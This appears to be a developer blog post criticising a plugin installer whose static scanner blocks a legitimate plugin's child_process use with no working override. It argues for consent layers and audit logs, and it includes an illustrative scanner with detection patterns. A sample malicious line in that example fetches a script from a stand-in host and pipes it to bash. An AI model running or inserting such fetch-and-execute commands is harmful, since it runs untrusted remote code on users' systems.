Here's a frustrating scenario: you find a community plugin that does exactly what you need. You run `openclaw plugins install`. And the install is blocked.
```
WARNING: Plugin "openclaw-codex-app-server" contains dangerous code patterns:
  Shell command execution detected (child_process) (src/client.ts:660)
Plugin installation blocked: dangerous code patterns detected
```
No override flag works. `--dangerously-force-unsafe-install`? Blocked too. The `--trust` flag that community docs reference? It doesn't exist.
This is a textbook case of a security mechanism that's correct in principle but broken in practice.
## The Tension
The plugin uses `child_process` because that's literally its job: spawning coding CLIs. OpenClaw's static analysis catches the pattern and blocks installation. Fair enough, given past incidents with malicious skills.
But the gate has no key. No sanctioned way to say "I reviewed this, I accept the risk."
## Three Design Principles This Violates
1. Flags should do what their names say. `--dangerously-force-unsafe-install` is explicit consent. If it doesn't work, why does it exist?
2. Security defaults should have documented overrides. Secure by default, configurable by choice. When the override is undocumented, users give up or find worse workarounds.
3. Static pattern matching has limits. Blocking `child_process` at the string level catches malicious and legitimate uses equally. A plugin spawning `codex` is different from one running `curl | bash`.
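To make that limitation concrete, here's a minimal sketch of string-level scanning. This is a hypothetical scanner, not OpenClaw's actual implementation; the patterns and messages are illustrative. The point is that a substring match carries no notion of intent:

```typescript
// Hypothetical string-level scanner (illustrative, not OpenClaw's code).
// It flags any source that mentions a pattern, with no notion of intent.
const DANGEROUS_PATTERNS: { pattern: RegExp; reason: string }[] = [
  { pattern: /child_process/, reason: "Shell command execution detected" },
  { pattern: /\beval\s*\(/, reason: "Dynamic code evaluation detected" },
];

function scan(source: string): string[] {
  return DANGEROUS_PATTERNS
    .filter((p) => p.pattern.test(source))
    .map((p) => p.reason);
}

// Both of these trip the same rule, though only one is malicious:
const legitimate = `import { spawn } from "child_process";
spawn("codex", ["--stdio"]); // the plugin's entire purpose`;
const malicious = `require("child_process").exec("curl evil.sh | bash");`;

console.log(scan(legitimate)); // identical finding for both inputs
console.log(scan(malicious));
```

Since the scanner cannot tell these apart, the decision has to fall to something that can: a human reviewer with a working consent mechanism.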
## What Good Looks Like
npm, VS Code, Docker, and Homebrew all follow the same pattern: warn loudly, document the override, log the decision.
## Takeaway
- Every deny must have a documented allow
- Override flags must actually override
- Static analysis needs a consent layer
- Log trust decisions for your audit trail
The goal isn't to remove the gate. It's to put a lock on it and give the user the key.
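One shape that key could take is a persisted trust record the CLI writes when the user consents. This file format is entirely hypothetical, a sketch of what "documented allow plus audit trail" might look like on disk:

```json
{
  "trustedPlugins": {
    "openclaw-codex-app-server": {
      "acceptedFindings": [
        "Shell command execution detected (child_process) (src/client.ts:660)"
      ],
      "acceptedBy": "user",
      "acceptedAt": "2025-01-15T10:00:00Z"
    }
  }
}
```

A record like this makes the override reviewable later: who accepted which findings, for which plugin, and when.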